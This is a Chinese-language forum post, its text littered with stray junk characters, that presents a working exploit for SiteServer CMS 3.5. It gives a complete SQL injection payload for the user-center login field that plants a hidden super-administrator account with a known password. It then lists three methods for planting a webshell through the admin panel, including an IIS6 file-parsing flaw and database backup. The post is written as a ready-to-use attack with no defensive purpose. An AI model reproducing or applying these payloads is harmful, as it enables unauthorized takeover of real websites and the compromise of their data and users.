经测试秒杀最新的3.5版
4 `) L( F; A3 |/ @# I1 q2 @2 Fstieserver官网:www.siteserver.cn, _# q. P2 U1 s& b7 u" q5 V
EXP:: l: P9 a+ E, f A$ ]4 g
直接访问UserCenter/login.aspx
R0 E( e* |8 f+ S7 U! |! O用户名处输入:: P9 E+ d. \2 z. ^% J4 V" r' M
3 [1 {; }0 H9 s& B, j
123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–
0 B$ V# L; O' w' y6 G3 W密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。
; a, F2 u$ r" ?之后再访问后台SiteServer/login.aspx用插入的用户登陆; p3 L5 H2 ^0 T
后台拿webshell的三种方法:
- ?1 U: Y1 F! z8 r4 Y/ X% ]一、0 f$ L: X& |# ~# }) l# g3 a
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
8 U/ `8 @1 ]" L, J二、
7 Q7 m$ V& c- q( C% M6 Z成员权限-》添加用户-》用户名为:1.asp
, X+ J! J% s$ p$ {! qhttp://127.0.0.1/usercenter/
- T% e, m" K5 p& U# s用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell/ d' G4 O& u$ B7 _
(ps:后台添加用户时不会验证是否含有非法字符)9 c8 H( w! x7 {# B* p6 ^ J
三、
' ~+ p/ ^, w3 j |9 t* G系统工具-》实用工具-》机器参数查看
# o9 L5 y' L( L8 v* c- n, X" g可以看到数据库类型、名称,WEB路径
# s; g/ \1 `. L# _4 F$ ]: U. g系统工具-》数据库工具-》SQL语句查询- j$ V8 ?: b$ T7 {( K3 @
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO |